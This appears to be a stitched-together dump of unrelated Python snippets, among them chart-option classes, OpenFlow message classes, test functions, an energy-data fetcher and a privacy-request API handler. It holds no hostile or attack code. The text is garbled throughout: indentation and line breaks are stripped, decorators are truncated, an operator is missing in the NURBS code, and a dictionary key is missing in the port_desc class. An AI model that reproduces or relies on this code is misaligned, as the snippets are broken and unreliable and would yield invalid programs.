class CommentInserter(gast.NodeVisitor): def __init__(self, tree, code): self.tree = tree self.ancestors = beniget.Ancestors() self.ancestors.visit(tree) self.code = code self.lines = code.split('\n') self.lines_comments = [] self.lineno_comments = [] for (index, line) in enumerate(self.lines): if line.strip().startswith('#'): self.lineno_comments.append((index + 1)) self.lines_comments.append(line) if (not self.lineno_comments): return self.last_line_comment = max(self.lineno_comments) self.index_comment = 0 self.node_after = {} self.node_before = [] self.previous_node = None self._done = False self.visit(tree) self.node_before = {self.lineno_comments[index]: node_before for (index, node_before) in enumerate(self.node_before)} self.modify_tree() def visit(self, node): if self._done: return if (hasattr(node, 'lineno') and (node.lineno is not None)): linenos = self.lineno_comments while (node.lineno > linenos[self.index_comment]): self.node_after[linenos[self.index_comment]] = node if (linenos[self.index_comment] == self.last_line_comment): self._done = True return self.index_comment += 1 while (len(self.node_after) > len(self.node_before)): self.node_before.append(self.previous_node) self.previous_node = node super().visit(node) def modify_tree(self): for (lineno, line) in zip(self.lineno_comments, self.lines_comments): try: node_after = self.node_after[lineno] except KeyError: self.tree.body.append(CommentLine(line, lineno)) continue else: self.insert_comment_in_parent_before_node(line, lineno, node_after) continue try: node_before = self.node_before[lineno] except KeyError: pass else: if isinstance(node_before, gast.Module): self.tree.body.insert(0, CommentLine(line, lineno)) def insert_comment_in_parent_before_node(self, line, lineno, node): parent = self.ancestors.parent(node) comment = line.strip() for (field, value) in gast.iter_fields(parent): if isinstance(value, list): if (node in value): index = value.index(node) value.insert(index, CommentLine(comment, lineno))
class OptionPlotoptionsVariwideStates(Options): def hover(self) -> 'OptionPlotoptionsVariwideStatesHover': return self._config_sub_data('hover', OptionPlotoptionsVariwideStatesHover) def inactive(self) -> 'OptionPlotoptionsVariwideStatesInactive': return self._config_sub_data('inactive', OptionPlotoptionsVariwideStatesInactive) def normal(self) -> 'OptionPlotoptionsVariwideStatesNormal': return self._config_sub_data('normal', OptionPlotoptionsVariwideStatesNormal) def select(self) -> 'OptionPlotoptionsVariwideStatesSelect': return self._config_sub_data('select', OptionPlotoptionsVariwideStatesSelect)
.parametrize('elasticapm_client', [{'debug': True}], indirect=True) def test_instrumentation_debug_client_debug(flask_apm_client): flask_apm_client.app.debug = True assert (len(flask_apm_client.client.events[TRANSACTION]) == 0) resp = flask_apm_client.app.test_client().post('/users/', data={'foo': 'bar'}) resp.close() assert (len(flask_apm_client.client.events[TRANSACTION]) == 1)
class RobotArm(Boxes): ui_group = 'Part' def __init__(self) -> None: Boxes.__init__(self) self.addSettingsArgs(edges.FingerJointSettings) for i in range(1, 6): ra = robot.RobotArg(True) sa = servos.ServoArg() self.argparser.add_argument(('--type%i' % i), action='store', type=ra, default='none', choices=ra.choices(), help='type of arm segment') self.argparser.add_argument(('--servo%ia' % i), action='store', type=sa, default='Servo9g', choices=sa.choices(), help='type of servo to use') self.argparser.add_argument(('--servo%ib' % i), action='store', type=sa, default='Servo9g', choices=sa.choices(), help='type of servo to use on second side (if different is supported)') self.argparser.add_argument(('--length%i' % i), action='store', type=float, default=50.0, help='length of segment axle to axle') def render(self): for i in range(5, 0, (- 1)): armtype = getattr(self, ('type%i' % i)) length = getattr(self, ('length%i' % i)) servoA = getattr(self, ('servo%ia' % i)) servoB = getattr(self, ('servo%ib' % i)) armcls = getattr(robot, armtype, None) if (not armcls): continue servoClsA = getattr(servos, servoA) servoClsB = getattr(servos, servoB) armcls(self, servoClsA(self), servoClsB(self))(length, move='up')
class MemoryEth1PeerTracker(SQLiteEth1PeerTracker): def __init__(self, genesis_hash: Hash32=None, protocols: Tuple[(str, ...)]=None, protocol_versions: Tuple[(int, ...)]=None, network_id: int=None) -> None: session = get_tracking_database(Path(':memory:')) super().__init__(session, genesis_hash, protocols, protocol_versions, network_id)
class bsn_gentable_entry_stats_request(bsn_stats_request): version = 5 type = 18 stats_type = 65535 experimenter = 6035143 subtype = 3 def __init__(self, xid=None, flags=None, table_id=None, checksum=None, checksum_mask=None): if (xid != None): self.xid = xid else: self.xid = None if (flags != None): self.flags = flags else: self.flags = 0 if (table_id != None): self.table_id = table_id else: self.table_id = 0 if (checksum != None): self.checksum = checksum else: self.checksum = 0 if (checksum_mask != None): self.checksum_mask = checksum_mask else: self.checksum_mask = 0 return def pack(self): packed = [] packed.append(struct.pack('!B', self.version)) packed.append(struct.pack('!B', self.type)) packed.append(struct.pack('!H', 0)) packed.append(struct.pack('!L', self.xid)) packed.append(struct.pack('!H', self.stats_type)) packed.append(struct.pack('!H', self.flags)) packed.append(('\x00' * 4)) packed.append(struct.pack('!L', self.experimenter)) packed.append(struct.pack('!L', self.subtype)) packed.append(struct.pack('!H', self.table_id)) packed.append(('\x00' * 2)) packed.append(util.pack_checksum_128(self.checksum)) packed.append(util.pack_checksum_128(self.checksum_mask)) length = sum([len(x) for x in packed]) packed[2] = struct.pack('!H', length) return ''.join(packed) def unpack(reader): obj = bsn_gentable_entry_stats_request() _version = reader.read('!B')[0] assert (_version == 5) _type = reader.read('!B')[0] assert (_type == 18) _length = reader.read('!H')[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.xid = reader.read('!L')[0] _stats_type = reader.read('!H')[0] assert (_stats_type == 65535) obj.flags = reader.read('!H')[0] reader.skip(4) _experimenter = reader.read('!L')[0] assert (_experimenter == 6035143) _subtype = reader.read('!L')[0] assert (_subtype == 3) obj.table_id = reader.read('!H')[0] reader.skip(2) obj.checksum = util.unpack_checksum_128(reader) obj.checksum_mask = util.unpack_checksum_128(reader) return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.xid != other.xid): return False if (self.flags != other.flags): return False if (self.table_id != other.table_id): return False if (self.checksum != other.checksum): return False if (self.checksum_mask != other.checksum_mask): return False return True def pretty_print(self, q): q.text('bsn_gentable_entry_stats_request {') with q.group(): with q.indent(2): q.breakable() q.text('xid = ') if (self.xid != None): q.text(('%#x' % self.xid)) else: q.text('None') q.text(',') q.breakable() q.text('flags = ') value_name_map = {1: 'OFPSF_REQ_MORE'} q.text(util.pretty_flags(self.flags, value_name_map.values())) q.text(',') q.breakable() q.text('table_id = ') q.text(('%#x' % self.table_id)) q.text(',') q.breakable() q.text('checksum = ') q.pp(self.checksum) q.text(',') q.breakable() q.text('checksum_mask = ') q.pp(self.checksum_mask) q.breakable() q.text('}')
class ListClosedWorkflowExecutionsRequest(betterproto.Message): namespace: str = betterproto.string_field(1) maximum_page_size: int = betterproto.int32_field(2) next_page_token: bytes = betterproto.bytes_field(3) start_time_filter: v1filter.StartTimeFilter = betterproto.message_field(4) execution_filter: v1filter.WorkflowExecutionFilter = betterproto.message_field(5, group='filters') type_filter: v1filter.WorkflowTypeFilter = betterproto.message_field(6, group='filters') status_filter: v1filter.StatusFilter = betterproto.message_field(7, group='filters')
class OptionPlotoptionsLineSonificationDefaultinstrumentoptionsMappingLowpassResonance(Options): def mapFunction(self): return self._config_get(None) def mapFunction(self, value: Any): self._config(value, js_type=False) def mapTo(self): return self._config_get(None) def mapTo(self, text: str): self._config(text, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def within(self): return self._config_get(None) def within(self, value: Any): self._config(value, js_type=False)
class OptionSeriesBoxplotData(Options): def accessibility(self) -> 'OptionSeriesBoxplotDataAccessibility': return self._config_sub_data('accessibility', OptionSeriesBoxplotDataAccessibility) def boxDashStyle(self): return self._config_get('Solid') def boxDashStyle(self, text: str): self._config(text, js_type=False) def className(self): return self._config_get(None) def className(self, text: str): self._config(text, js_type=False) def color(self): return self._config_get(None) def color(self, text: str): self._config(text, js_type=False) def colorIndex(self): return self._config_get(None) def colorIndex(self, num: float): self._config(num, js_type=False) def custom(self): return self._config_get(None) def custom(self, value: Any): self._config(value, js_type=False) def dataLabels(self) -> 'OptionSeriesBoxplotDataDatalabels': return self._config_sub_data('dataLabels', OptionSeriesBoxplotDataDatalabels) def description(self): return self._config_get(None) def description(self, text: str): self._config(text, js_type=False) def dragDrop(self) -> 'OptionSeriesBoxplotDataDragdrop': return self._config_sub_data('dragDrop', OptionSeriesBoxplotDataDragdrop) def drilldown(self): return self._config_get(None) def drilldown(self, text: str): self._config(text, js_type=False) def events(self) -> 'OptionSeriesBoxplotDataEvents': return self._config_sub_data('events', OptionSeriesBoxplotDataEvents) def high(self): return self._config_get(None) def high(self, num: float): self._config(num, js_type=False) def id(self): return self._config_get(None) def id(self, text: str): self._config(text, js_type=False) def labelrank(self): return self._config_get(None) def labelrank(self, num: float): self._config(num, js_type=False) def low(self): return self._config_get(None) def low(self, num: float): self._config(num, js_type=False) def median(self): return self._config_get(None) def median(self, num: float): self._config(num, js_type=False) def medianDashStyle(self): return self._config_get('Solid') def medianDashStyle(self, text: str): self._config(text, js_type=False) def name(self): return self._config_get(None) def name(self, text: str): self._config(text, js_type=False) def q1(self): return self._config_get(None) .setter def q1(self, num: float): self._config(num, js_type=False) def q3(self): return self._config_get(None) .setter def q3(self, num: float): self._config(num, js_type=False) def selected(self): return self._config_get(False) def selected(self, flag: bool): self._config(flag, js_type=False) def stemDashStyle(self): return self._config_get('Solid') def stemDashStyle(self, text: str): self._config(text, js_type=False) def whiskerDashStyle(self): return self._config_get('Solid') def whiskerDashStyle(self, text: str): self._config(text, js_type=False) def x(self): return self._config_get(None) def x(self, num: float): self._config(num, js_type=False) def y(self): return self._config_get(None) def y(self, num: float): self._config(num, js_type=False)
_frequency(timedelta(days=1)) def fetch_production(zone_key: str='NL', session: (Session | None)=None, target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)): if (target_datetime is None): target_datetime = arrow.utcnow().datetime r = (session or Session()) consumptions = ENTSOE.fetch_consumption(zone_key=zone_key, session=r, target_datetime=target_datetime, logger=logger) if (not consumptions): return for c in consumptions: del c['source'] df_consumptions = pd.DataFrame.from_dict(consumptions) df_consumptions['datetime'] = df_consumptions['datetime'].apply((lambda x: x.replace(tzinfo=UTC))) exchanges = [] for exchange_key in ['BE', 'DE', 'GB', 'NO-NO2']: (zone_1, zone_2) = sorted([exchange_key, zone_key]) exchange = ENTSOE.fetch_exchange(zone_key1=zone_1, zone_key2=zone_2, session=r, target_datetime=target_datetime, logger=logger) if (not exchange): return exchanges.extend((exchange or [])) if (target_datetime > arrow.get('2019-08-24', 'YYYY-MM-DD')): (zone_1, zone_2) = sorted(['DK-DK1', zone_key]) df_dk = pd.DataFrame(DK.fetch_exchange(zone_key1=zone_1, zone_key2=zone_2, session=r, target_datetime=target_datetime, logger=logger)) df_dk['datetime'] = df_dk['datetime'].dt.floor('H') exchange_DK = df_dk.groupby(['datetime']).aggregate({'netFlow': 'mean', 'sortedZoneKeys': 'max', 'source': 'max'}).reset_index() exchange_DK = exchange_DK.round({'netFlow': 3}) exchanges.extend(exchange_DK.to_dict(orient='records')) for e in exchanges: if e['sortedZoneKeys'].startswith('NL->'): e['NL_import'] = ((- 1) * e['netFlow']) else: e['NL_import'] = e['netFlow'] del e['source'] del e['netFlow'] df_exchanges = pd.DataFrame.from_dict(exchanges) df_exchanges['datetime'] = df_exchanges['datetime'].apply((lambda x: x.replace(tzinfo=UTC))) df_exchanges = df_exchanges.groupby('datetime').sum() df_consumptions_with_exchanges = df_consumptions.join(df_exchanges).fillna(method='ffill', limit=3) df_total_generations = (df_consumptions_with_exchanges['consumption'] - df_consumptions_with_exchanges['NL_import']) productions = ENTSOE.fetch_production(zone_key=zone_key, session=r, target_datetime=target_datetime, logger=logger) if (not productions): return for p in productions: if (('unknown' not in p['production']) or (p['production']['unknown'] is None)): p['production']['unknown'] = 0 Z = sum([(x or 0) for x in p['production'].values()]) if ((p['datetime'] in df_total_generations) and (Z < df_total_generations[p['datetime']])): p['production']['unknown'] = round(((df_total_generations[p['datetime']] - Z) + p['production']['unknown']), 3) solar_capacity_df = get_solar_capacities() wind_capacity_df = get_wind_capacities() for p in productions: p['capacity'] = {'solar': round(get_solar_capacity_at(p['datetime'], solar_capacity_df), 3), 'wind': round(get_wind_capacity_at(p['datetime'], wind_capacity_df), 3)} return [p for p in productions if (p['production']['unknown'] > 0)]
def extractCleverneckoHomeBlog(item): badwords = ['movie review', 'badword'] if any([(bad in item['tags']) for bad in badwords]): return None (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title']) if ((not (chp or vol)) or ('preview' in item['title'].lower())): return None tagmap = [('your husbands leg is broken', 'your husbands leg is broken', 'translated'), ('the case of the 27 knife stabs', 'the case of the 27 knife stabs', 'translated'), ('Fate', 'Fate, something so wonderful', 'translated'), ('kimi no shiawase wo negatteita', 'kimi no shiawase wo negatteita', 'translated'), ('warm waters', 'warm waters', 'translated'), ('after being marked by a powerful love rival', 'after being marked by a powerful love rival', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')] for (tagname, name, tl_type) in tagmap: if (tagname in item['tags']): return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) return False
def test_is_valid_opcode_valid_with_PUSH32_just_past_boundary(): code_stream = CodeStream(((b'\x7f' + (b'\x00' * 32)) + b'`')) assert (code_stream.is_valid_opcode(0) is True) for pos in range(1, 33): assert (code_stream.is_valid_opcode(pos) is False) assert (code_stream.is_valid_opcode(33) is True) assert (code_stream.is_valid_opcode(34) is False)
def process_r(N): if (N < (2 ** threshold_bits)): x = ((gmpy2.mpz_random(random_state, ((N + 1) // 2)) + (N // 2)) + 1) return (x, factor_N(x)) while True: (p, alpha) = process_f(N) q = (p ** alpha) Nprime = int((N // q)) (y, yf) = process_r(Nprime) x = (y * q) l = gmpy2.mpfr_random(random_state) if (l < (gmpy2.log((N // 2)) / gmpy2.log(x))): return (x, (([p] * alpha) + yf))
.parametrize('PKs, aggregate_signature, message, result', [(*compute_aggregate_signature(SKs=[1], message=sample_message), sample_message, True), (*compute_aggregate_signature(SKs=tuple(range(1, 5)), message=sample_message), sample_message, True), ([], Z2_SIGNATURE, sample_message, False), ([G2ProofOfPossession.SkToPk(1), Z1_PUBKEY], G2ProofOfPossession.Sign(1, sample_message), sample_message, False)]) def test_fast_aggregate_verify(PKs, aggregate_signature, message, result): assert (G2ProofOfPossession.FastAggregateVerify(PKs, message, aggregate_signature) == result)
def get_adr_commission_votes(case_id): with db.engine.connect() as conn: rs = conn.execute(ADR_COMMISSION_VOTES, case_id) commission_votes = [] for row in rs: commission_votes.append({'vote_date': row['vote_date'], 'action': row['action'], 'commissioner_name': row['commissioner_name'], 'vote_type': row['vote_type']}) return commission_votes
class OptionPlotoptionsSplineSonificationDefaultinstrumentoptionsActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
_tasks('spacy.TextCat.v1') def make_textcat_task(parse_responses: Optional[TaskResponseParser[TextCatTask]]=None, prompt_example_type: Optional[Type[FewshotExample]]=None, labels: str='', examples: ExamplesConfigType=None, normalizer: Optional[Callable[([str], str)]]=None, exclusive_classes: bool=False, allow_none: bool=True, verbose: bool=False, scorer: Optional[Scorer]=None) -> 'TextCatTask': labels_list = split_labels(labels) raw_examples = (examples() if callable(examples) else examples) example_type = (prompt_example_type or TextCatExample) textcat_examples = ([example_type(**eg) for eg in raw_examples] if raw_examples else None) return TextCatTask(parse_responses=(parse_responses or parse_responses_v1_v2_v3), prompt_example_type=example_type, labels=labels_list, template=DEFAULT_TEXTCAT_TEMPLATE_V1, prompt_examples=textcat_examples, normalizer=normalizer, exclusive_classes=exclusive_classes, allow_none=allow_none, verbose=verbose, label_definitions=None, scorer=(scorer or score))
def zone2offset(tz, dt): if isinstance(tz, int): return tz if isinstance(tz, str): return validateTimeZone(tz) (tz, tzo) = tz if ((tzo is None) or (tzo == '')): return TZ_ABBR_OFFS[tz] if (len(tzo) <= 3): return (TZ_ABBR_OFFS[tz] + (int(tzo) * 60)) if (tzo[3] != ':'): return (TZ_ABBR_OFFS[tz] + (((- 1) if (tzo[0] == '-') else 1) * ((int(tzo[1:3]) * 60) + int(tzo[3:5])))) else: return (TZ_ABBR_OFFS[tz] + (((- 1) if (tzo[0] == '-') else 1) * ((int(tzo[1:3]) * 60) + int(tzo[4:6]))))
def read_user_pattern(wb, offset, length, pattern=None): for i in range(length): read_value = wb.read((wb.mems.main_ram.base + (4 * (offset + i)))) if (pattern is None): print('0x{:08x}'.format(read_value)) else: if (read_value == pattern): outcome = 'CORRECT' else: outcome = 'INCORRECT' print('{} --> 0x{:08x}, 0x{:08x}'.format(outcome, read_value, pattern))
class NURBS(): nrefine: int = 2 def generate(self, radius): (topo, geom0) = mesh.rectilinear([1, 2]) bsplinebasis = topo.basis('spline', degree=2) controlweights = numpy.ones(12) controlweights[1:3] = (0.5 + (0.25 * numpy.sqrt(2))) weightfunc = (bsplinebasis controlweights) nurbsbasis = ((bsplinebasis * controlweights) / weightfunc) A = (0, 0, 0) B = ((((2 ** 0.5) - 1) * radius), ((0.3 * (radius + 1)) / 2), 1) C = (radius, ((radius + 1) / 2), 1) controlpoints = numpy.array([[A, B, C, C], [C, C, B, A]]).T.reshape((- 1), 2) geom = (nurbsbasis controlpoints) if self.nrefine: topo = topo.refine(self.nrefine) bsplinebasis = topo.basis('spline', degree=2) sqr = topo.integral(((function.dotarg('w', bsplinebasis) - weightfunc) ** 2), degree=9) controlweights = solver.optimize('w', sqr) nurbsbasis = ((bsplinebasis * controlweights) / weightfunc) return (topo.withboundary(hole='left', sym='top,bottom', far='right'), geom, nurbsbasis, 5)
def start(): opt = parse_opt() xeH = xeHentai() if (opt.auto_update != 'off'): check_update(xeH.logger, {'auto_update': opt.auto_update, 'update_beta_channel': opt.update_beta_channel}) if opt.daemon: if opt.interactive: xeH.logger.warning(i18n.XEH_OPT_IGNORING_I) if (os.name == 'posix'): pid = os.fork() if (pid == 0): sys.stdin.close() sys.stdout = open('/dev/null', 'w') sys.stderr = open('/dev/null', 'w') return main(xeH, opt) elif (os.name == 'nt'): return xeH.logger.error((i18n.XEH_PLATFORM_NO_DAEMON % os.name)) else: return xeH.logger.error((i18n.XEH_PLATFORM_NO_DAEMON % os.name)) xeH.logger.info((i18n.XEH_DAEMON_START % pid)) else: main(xeH, opt)
class MarkdownSettings(BaseModel): align: str badges_offline: str badges_shields: str badges_skills: str badges_style: str contribute: str default: str features: str getting_started: str header: str header_left: str image: str modules: str modules_widget: str overview: str slogan: str tables: str toc: str tree: str
class FaucetUntaggedMirrorTest(FaucetUntaggedTest): CONFIG_GLOBAL = '\nvlans:\n 100:\n description: "untagged"\n' CONFIG = '\n interfaces:\n %(port_1)d:\n native_vlan: 100\n %(port_2)d:\n native_vlan: 100\n %(port_3)d:\n output_only: True\n %(port_4)d:\n native_vlan: 100\n' def test_untagged(self): (first_host, second_host, mirror_host) = self.hosts_name_ordered()[0:3] first_host_ip = ipaddress.ip_address(first_host.IP()) second_host_ip = ipaddress.ip_address(second_host.IP()) self.flap_all_switch_ports() self.change_port_config(self.port_map['port_3'], 'mirror', self.port_map['port_1'], restart=True, cold_start=False) self.verify_ping_mirrored(first_host, second_host, mirror_host) self.verify_bcast_ping_mirrored(first_host, second_host, mirror_host) self.verify_iperf_min(((first_host, self.port_map['port_1']), (second_host, self.port_map['port_2'])), MIN_MBPS, first_host_ip, second_host_ip, sync_counters_func=(lambda : self.one_ipv4_ping(first_host, second_host_ip))) self.change_port_config(self.port_map['port_3'], 'mirror', [], restart=True, cold_start=False) self.verify_iperf_min(((first_host, self.port_map['port_1']), (second_host, self.port_map['port_2'])), MIN_MBPS, first_host_ip, second_host_ip, sync_counters_func=(lambda : self.one_ipv4_ping(first_host, second_host_ip)))
class FileTreeNode(): def __init__(self, uid, root_uid=None, virtual=False, name=None, size=None, mime_type=None, has_children=False, not_analyzed=False): self.uid = uid self.root_uid = root_uid self.virtual = virtual self.name = name self.size = size self.type = mime_type self.has_children = has_children self.not_analyzed = not_analyzed self.children = {} def __str__(self): return f"Node '{self.name}' with children {self.get_names_of_children()}" def __repr__(self): return self.__str__() def __eq__(self, other): return ((self.uid == other.uid) and (self.name == other.name) and (self.virtual == other.virtual)) def __contains__(self, item): return (item.get_id() in self.children) def print_tree(self, spacer=''): logging.info(f'{spacer}{self.name} (virtual:{self.virtual}, has_children:{self.has_children})') for child_node in self.children.values(): child_node.print_tree(spacer=(spacer + '\t|')) def merge_node(self, node: FileTreeNode): current_node = self.children[node.get_id()] for child in node.get_list_of_child_nodes(): if (child in current_node): current_node.merge_node(child) else: current_node.add_child_node(child) def add_child_node(self, node: FileTreeNode): if (node in self): self.merge_node(node) else: self.has_children = True self.children[node.get_id()] = node def get_names_of_children(self) -> list[str]: return [n.name for n in self.get_list_of_child_nodes()] def get_list_of_child_nodes(self) -> list[FileTreeNode]: return list(self.children.values()) def get_id(self) -> tuple[(str, bool)]: return (self.name, self.virtual)
(PRIVACY_REQUEST_APPROVE, status_code=HTTP_200_OK, response_model=BulkReviewResponse) def approve_privacy_request(*, db: Session=Depends(deps.get_db), config_proxy: ConfigProxy=Depends(deps.get_config_proxy), client: ClientDetail=Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_REVIEW]), privacy_requests: ReviewPrivacyRequestIds) -> BulkReviewResponse: user_id = client.user_id def _approve_request(privacy_request: PrivacyRequest) -> None: now = datetime.utcnow() privacy_request.status = PrivacyRequestStatus.approved privacy_request.reviewed_at = now privacy_request.reviewed_by = user_id if privacy_request.custom_fields: privacy_request.custom_privacy_request_fields_approved_at = now privacy_request.custom_privacy_request_fields_approved_by = user_id privacy_request.save(db=db) AuditLog.create(db=db, data={'user_id': user_id, 'privacy_request_id': privacy_request.id, 'action': AuditLogAction.approved, 'message': ''}) if config_proxy.notifications.send_request_review_notification: _send_privacy_request_review_message_to_user(action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_APPROVE, identity_data=privacy_request.get_cached_identity_data(), rejection_reason=None, service_type=config_proxy.notifications.notification_service_type) queue_privacy_request(privacy_request_id=privacy_request.id) return review_privacy_request(db=db, request_ids=privacy_requests.request_ids, process_request_function=_approve_request)
.parametrize(['sql', 'expected'], [('EXEC AdventureWorks2022.dbo.uspGetEmployeeManagers 50;', 'EXECUTE AdventureWorks2022.dbo.uspGetEmployeeManagers'), ('EXECUTE sp_who2', 'EXECUTE sp_who2'), ("EXEC sp_updatestats _schemas = 'true'", 'EXECUTE sp_updatestats'), ('CALL get_car_stats_by_year(2017, , , , );', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year;', 'CALL get_car_stats_by_year()'), ('CALL get_car_stats_by_year();', 'CALL get_car_stats_by_year()')]) def test_extract_signature_for_procedure_call(sql, expected): actual = extract_signature(sql) assert (actual == expected)
class LiteEthPHYMDIO(LiteXModule): def __init__(self, pads): self._w = CSRStorage(fields=[CSRField('mdc', size=1), CSRField('oe', size=1), CSRField('w', size=1)], name='w') self._r = CSRStatus(fields=[CSRField('r', size=1)], name='r') data_w = Signal() data_oe = Signal() data_r = Signal() self.comb += [pads.mdc.eq(self._w.storage[0]), data_oe.eq(self._w.storage[1]), data_w.eq(self._w.storage[2])] self.specials += MultiReg(data_r, self._r.status[0]) self.specials += Tristate(pads.mdio, data_w, data_oe, data_r)
.parametrize('transform', ['INIT_TRANSFORM', 'OUTPUT_TRANSFORM']) def test_unknown_transform_functions_raises_a_config_error(parse_field_line, transform): with pytest.raises(expected_exception=ConfigValidationError, match=f'Line 3.*FIELD {transform}:silly is an invalid function'): _ = parse_field_line(f'FIELD F PARAMETER f.grdecl INIT_FILES:f%d.grdecl {transform}:silly')
class port_desc(loxi.OFObject): def __init__(self, port_no=None, hw_addr=None, name=None, config=None, state=None, curr=None, advertised=None, supported=None, peer=None): if (port_no != None): self.port_no = port_no else: self.port_no = 0 if (hw_addr != None): self.hw_addr = hw_addr else: self.hw_addr = [0, 0, 0, 0, 0, 0] if (name != None): self.name = name else: self.name = '' if (config != None): self.config = config else: self.config = 0 if (state != None): self.state = state else: self.state = 0 if (curr != None): self.curr = curr else: self.curr = 0 if (advertised != None): self.advertised = advertised else: self.advertised = 0 if (supported != None): self.supported = supported else: self.supported = 0 if (peer != None): self.peer = peer else: self.peer = 0 return def pack(self): packed = [] packed.append(util.pack_port_no(self.port_no)) packed.append(struct.pack('!6B', *self.hw_addr)) packed.append(struct.pack('!16s', self.name)) packed.append(struct.pack('!L', self.config)) packed.append(struct.pack('!L', self.state)) packed.append(struct.pack('!L', self.curr)) packed.append(struct.pack('!L', self.advertised)) packed.append(struct.pack('!L', self.supported)) packed.append(struct.pack('!L', self.peer)) return ''.join(packed) def unpack(reader): obj = port_desc() obj.port_no = util.unpack_port_no(reader) obj.hw_addr = list(reader.read('!6B')) obj.name = reader.read('!16s')[0].rstrip('\x00') obj.config = reader.read('!L')[0] obj.state = reader.read('!L')[0] obj.curr = reader.read('!L')[0] obj.advertised = reader.read('!L')[0] obj.supported = reader.read('!L')[0] obj.peer = reader.read('!L')[0] return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.port_no != other.port_no): return False if (self.hw_addr != other.hw_addr): return False if (self.name != other.name): return False if (self.config != other.config): return False if (self.state != other.state): return False if (self.curr != other.curr): return False if (self.advertised != other.advertised): return False if (self.supported != other.supported): return False if (self.peer != other.peer): return False return True def pretty_print(self, q): q.text('port_desc {') with q.group(): with q.indent(2): q.breakable() q.text('port_no = ') q.text(util.pretty_port(self.port_no)) q.text(',') q.breakable() q.text('hw_addr = ') q.text(util.pretty_mac(self.hw_addr)) q.text(',') q.breakable() q.text('name = ') q.pp(self.name) q.text(',') q.breakable() q.text('config = ') value_name_map = {1: 'OFPPC_PORT_DOWN', 2: 'OFPPC_NO_STP', 4: 'OFPPC_NO_RECV', 8: 'OFPPC_NO_RECV_STP', 16: 'OFPPC_NO_FLOOD', 32: 'OFPPC_NO_FWD', 64: 'OFPPC_NO_PACKET_IN', : 'OFPPC_BSN_MIRROR_DEST'} q.text(util.pretty_flags(self.config, value_name_map.values())) q.text(',') q.breakable() q.text('state = ') value_name_map = {1: 'OFPPS_LINK_DOWN', 0: 'OFPPS_STP_LISTEN', 256: 'OFPPS_STP_LEARN', 512: 'OFPPS_STP_FORWARD', 768: 'OFPPS_STP_MASK'} q.text(util.pretty_flags(self.state, value_name_map.values())) q.text(',') q.breakable() q.text('curr = ') value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'} q.text(util.pretty_flags(self.curr, value_name_map.values())) q.text(',') q.breakable() q.text('advertised = ') value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'} q.text(util.pretty_flags(self.advertised, value_name_map.values())) q.text(',') q.breakable() q.text('supported = ') value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'} q.text(util.pretty_flags(self.supported, value_name_map.values())) q.text(',') q.breakable() q.text('peer = ') value_name_map = {1: 'OFPPF_10MB_HD', 2: 'OFPPF_10MB_FD', 4: 'OFPPF_100MB_HD', 8: 'OFPPF_100MB_FD', 16: 'OFPPF_1GB_HD', 32: 'OFPPF_1GB_FD', 64: 'OFPPF_10GB_FD', 128: 'OFPPF_COPPER', 256: 'OFPPF_FIBER', 512: 'OFPPF_AUTONEG', 1024: 'OFPPF_PAUSE', 2048: 'OFPPF_PAUSE_ASYM'} q.text(util.pretty_flags(self.peer, value_name_map.values())) q.breakable() q.text('}')
